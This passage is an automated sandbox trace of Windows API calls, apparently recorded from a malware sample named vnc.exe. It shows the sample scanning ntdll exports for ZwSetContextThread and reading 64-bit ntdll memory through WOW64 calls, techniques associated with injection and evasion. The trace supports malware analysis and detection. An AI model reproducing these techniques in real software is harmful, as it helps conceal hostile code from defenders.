(lpString1="EtwRegisterTraceGuidsA", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwSetContextThread") returned -1 [0134.782] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwSetContextThread") returned -1 [0134.783] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwSetContextThread") returned -1 [0134.784] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwSetContextThread") returned -1 [0134.785] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwSetContextThread") returned -1 [0134.786] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwSetContextThread") returned -1 [0134.786] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwSetContextThread") returned -1 [0134.786] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwSetContextThread") returned -1 [0134.786] lstrcmpA (lpString1="MD4Final", lpString2="ZwSetContextThread") returned -1 [0134.786] lstrcmpA (lpString1="MD4Init", lpString2="ZwSetContextThread") returned -1 [0134.786] lstrcmpA (lpString1="MD4Update", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="MD5Final", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="MD5Init", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="MD5Update", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwSetContextThread") returned -1 [0134.787] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwSetContextThread") returned -1 [0134.788] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwSetContextThread") returned -1 [0134.789] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtClose", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwSetContextThread") returned -1 [0134.790] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwSetContextThread") returned -1 [0134.791] VirtualFree (lpAddress=0xa90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.801] CloseHandle (hObject=0x17c) returned 1 [0134.801] LocalAlloc (uFlags=0x0, uBytes=0x1000) returned 0x62a468 [0134.801] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0134.802] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0134.802] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19f008, ProcessInformationLength=0x30, ReturnLength=0x19f060 | out: ProcessInformation64=0x19f008, ReturnLength=0x19f060) returned 0x0 [0134.802] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x25e000, Buffer=0x0, BufferSize=0x19f038, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0135.189] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0xbac60000, Buffer=0x7ff6, BufferSize=0x62a468, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff6, NumberOfBytesRead=0x1000) returned 0x0 [0135.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0xbac600f0, Buffer=0x7ff6, BufferSize=0x62a468, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff6, NumberOfBytesRead=0x1000) returned 0x0 [0135.342] LocalFree (hMem=0x62a468) returned 0x0 [0135.343] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0xbac63980, Buffer=0x7ff6, BufferSize=0x19f5b0, NumberOfBytesRead=0x4 | out: Buffer=0x7ff6, NumberOfBytesRead=0x4) returned 0x0 [0135.457] GetCurrentProcessId () returned 0xaf4 [0135.457] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x17c [0135.457] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0135.458] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0135.458] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef60, ProcessInformationLength=0x30, ReturnLength=0x19efb8 | out: ProcessInformation64=0x19ef60, ReturnLength=0x19efb8) returned 0x0 [0135.458] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0135.458] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0135.458] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0135.458] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0135.458] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.458] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.458] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.458] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.459] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.459] LocalFree (hMem=0x629120) returned 0x0 [0135.459] LocalFree (hMem=0x61df68) returned 0x0 [0135.459] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0135.459] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0135.459] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0135.459] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef60, ProcessInformationLength=0x30, ReturnLength=0x19efb8 | out: ProcessInformation64=0x19ef60, ReturnLength=0x19efb8) returned 0x0 [0135.459] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0135.459] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0135.459] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0135.461] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0135.461] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.461] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e18a8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x58 | out: Buffer=0x0, NumberOfBytesRead=0x58) returned 0x0 [0135.462] StrRChrA (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpEnd=0x0, wMatch=0x5c) returned="\\vnc.exe" [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e19f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0135.462] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2290, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0135.462] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2570, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0135.462] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.462] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2090, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0135.462] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0135.462] LocalFree (hMem=0x629120) returned 0x0 [0135.462] LocalFree (hMem=0x61df68) returned 0x0 [0135.462] lstrcmpiA (lpString1="vnc.exe", lpString2="NTDLL.DLL") returned 1 [0135.462] StrChrA (lpStart="vnc.exe", wMatch=0x2e) returned=".exe" [0135.462] lstrcmpiA (lpString1="vnc", lpString2="NTDLL.DLL") returned 1 [0135.463] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0135.463] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.463] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xa90000 [0135.464] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xa90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.464] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xa91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.464] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xa92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.464] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xa93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.464] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xa94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.465] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xa95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.465] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xa96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.465] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xa97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 